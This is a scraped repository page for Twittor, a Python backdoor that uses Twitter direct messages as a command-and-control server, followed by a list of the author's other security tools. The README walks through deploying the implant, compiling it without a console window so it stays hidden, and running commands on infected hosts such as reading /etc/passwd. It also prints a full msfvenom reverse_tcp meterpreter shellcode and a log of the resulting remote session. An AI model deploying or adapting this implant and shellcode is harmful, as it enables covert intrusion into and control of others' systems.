• Stars
    star
    759
  • Rank 59,846 (Top 2 %)
  • Language
    Python
  • License
    MIT License
  • Created about 9 years ago
  • Updated about 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A fully featured backdoor that uses Twitter as a C&C server

Twittor

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server This project has been inspired by Gcat which does the same but using a Gmail account.

Setup

For this to work you need:

  • A Twitter account (Use a dedicated account! Do not use your personal one!)
  • Register an app on Twitter with Read, write, and direct messages Access levels.

Install the dependencies:

$ pip install -r requirements.txt

This repo contains two files:

  • twittor.py which is the client
  • implant.py the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

You're probably going to want to compile implant.py into an executable using Pyinstaller In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile will help. Just saying.

Usage

In order to run the client, launch the script.

$ python twittor.py

You'll then get into an 'interactive' shell which offers few commands that are:

$ help

    refresh - refresh C&C control
    list_bots - list active bots
    list_commands - list executed commands
    !retrieve <jobid> - retrieve jobid command
    !cmd <MAC ADDRESS> command - execute the command on the bot
    !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
    help - print this usage
    exit - exit the client
    
$ 
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.

  • Let's issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd, the script then outputs the jobid that we can use to retrieve the output of that command

  • Lets get the results!
$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)

Command to use in that case is !retrieve followed by the jobid from the command.

  • Refresh results

In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.

$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$

This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.

  • Retrieve previous commands

As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
  • Running shellcode (Windows hosts)

This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.

Generate your meterpreter shellcode, like:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Extract the shellcode and send it to the specified bot using the !shellcode command!

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

Et voilà!

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615 
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Open a beer and enjoy your reverse meterpreter shell.

Contributing and/or questions?

Project is entirely open source and released under MIT license. I mostly wanted to create a PoC after Twitter decided to remove the 140 characters limit for the Direct Messages. Few stuff should be added such as Encryption (Adding AES on top of it). "Messages" are using a dictionary data structure and the whole command is only base64 encoded. Fork the project, contribute, submit pull requests, and have fun.

If you find a bug, open an issue on Github and/or ping me on Twitter.

Again, feel free to check the Gcat amazing project from byt3bl33d3r that inspired me a lot.

More Repositories

1

awesome-sec-talks

A collected list of awesome security talks
3,999
star
2

awesome-windows-domain-hardening

A curated list of awesome Security Hardening techniques for Windows.
1,737
star
3

API-dnsdumpster.com

(Unofficial) Python API for https://dnsdumpster.com/
Python
274
star
4

HQLmap

(Deprecated) HQLmap, Automatic tool to exploit HQL injections
Python
223
star
5

CSRFT

A lightweight CSRF Toolkit for easy Proof of concept
Python
174
star
6

Shodan-Firefox-Addon

Shodan Firefox Add-on
JavaScript
151
star
7

Shodan.io-mobile-app

Official repository for the Shodan.io mobile Application
TypeScript
138
star
8

crt.sh

(Unofficial) Python API for https://crt.sh
Python
129
star
9

osint-facebook-reset-password

Python util to retrieve full display name and profile picture from a single email address
Python
95
star
10

skype-osint

Python OSINT Tool to retrieve information from Skype
Python
74
star
11

API-EZTV.it

(Unofficial) Python API for the torrent website EZTV.it
Python
72
star
12

SPIPScan

SPIP (CMS) Scanner for penetration testing purpose written in Python
Python
69
star
13

metasearch-public

Stop searching for sample hashes on 10 different sites.
Python
65
star
14

API-malwr.com

(Unofficial) Python API for https://malwr.com/
Python
62
star
15

go-http-monitor

A (dead-simple) Golang utility allowing you to monitor HTTP endpoints
Go
38
star
16

cybercrime-tracker.net

(Unofficial) Python API for cybercrime-tracker.net
Python
37
star
17

API-InstagramLocation

Python OSINT Tool to retrieve pictures from a specific location using Instagram API
Python
35
star
18

pepito

Finds sensitive stuff in your git repository by specifying terms to look for
Python
31
star
19

Shodan-mattermost

Mattermost - Shodan Slash command
Python
30
star
20

VNWA

Vulnerable Node.js Web Application to pratice with your pentesting skills
JavaScript
21
star
21

API-namechk.com

(Unofficial) Python API for http://namechk.com
Python
19
star
22

HTTP-traceroute

HTTP-traceroute in Go
Go
18
star
23

ransomware-tracker

(Unofficial) Python API for http://ransomwaretracker.abuse.ch/tracker/
Python
16
star
24

API-netcraft.com

(Unofficial) Python API for http://netcraft.com
Python
15
star
25

SearchShodan

This is a basic example of how to search into Shodan using the ShodanAPI.
Python
15
star
26

exploitdb-json-api

JSON API for ExploitDB Website
JavaScript
15
star
27

API-checkusernames.com

(Unofficial) Python API for http://checkusernames.com
Python
13
star
28

XSS-Callback

A lightweight HTTP Server that exploits XSS victim's session automatically
JavaScript
11
star
29

SSLBlackList

(Unofficial) Python API for https://sslbl.abuse.ch/
Python
11
star
30

WhatHashIsIt

# Deprecated # "What hash is it?" service allows you to identify the hashing functions used of your hash(es) based on their characteristics.
JavaScript
10
star
31

Social-Markdown

"Dillinger.io clone" allowing live concurrent editing.
JavaScript
10
star
32

TVShowsManager

Basic manager to download your TV Shows automatically with EZTV.it website.
Python
9
star
33

recon-scan

Recon tool using Yatedo and Pipl
Python
9
star
34

paulsec.github.io

Repository containing my portfolio
HTML
8
star
35

censysio

Censysio Python wrapper
Python
7
star
36

Python-plugins

Quick Python project with a simple Plugin architecture
Python
7
star
37

API-HaveIBeenPwned

(Unofficial) Python API for HaveIBeenPwned Website
Python
7
star
38

what-is-this-browser

Python script that tells you what's the potential configuration behind a User-Agent
Python
6
star
39

markovobfuscate

Python library and tools to obfuscate data based on Markov models built off the same data
Python
6
star
40

drupal-enum-users

(Python) Quick script to enumerate users on a Drupal instance
Python
6
star
41

burito

# Deprecated # Burito, Hydra-like tool to audit Web application using forms containing server-side generated params.
Python
6
star
42

API-Email-Format

email-format.com (Unofficial) Python API
Python
5
star
43

Virus-Total-Dump

Python script that dumps behavourial information about a list of hashes
Python
5
star
44

API-Yatedo

(Unofficial) Python API for Yatedo Website
Python
5
star
45

shellpot-nodejs

Honeypot written in Node.js for the Shellshock vulnerability
JavaScript
4
star
46

filesharer-nodejs

File sharer based on Node.js using AES encryption for your files
JavaScript
4
star
47

API-ShouldIChangeMyPassword

(Unofficial) Python API for ShouldIChangeMyPassword Website
Python
4
star
48

node-ip-info

Retrieves information about a specific IP
JavaScript
4
star
49

Raspberry-APT

# Deprecated # Raspberry APT - Automatic Pwn Tool suite to perform automatic pentest.
Python
4
star
50

feedrss-python

Quick command line tool to retrieve RSS blog post ordered by published date
Python
3
star
51

slidecast

Python utility to show pictures in a slideshow on your chromecast
Python
3
star
52

JSONLogger

JSONLogger - HTTP Proxy that logs JSON HTTP Response in the console
JavaScript
3
star
53

API-Pipl

(Unofficial) Python API for Pipl Website
Python
3
star
54

wordpress-vulnscan-add-on

Mozilla Add-on that retrieves potential vulnerabilities based on the Wordpress website you're visiting
2
star
55

kafka-boilerplate-docker

Kafka boilerplate example with docker-compose
Python
2
star
56

clermontech-fastapi

Python
1
star
57

Telegram-bot

Python bot to control your server through Telegram
1
star
58

API-oldpiratebay

(Unofficial) Python API for Old Pirate Bay
Python
1
star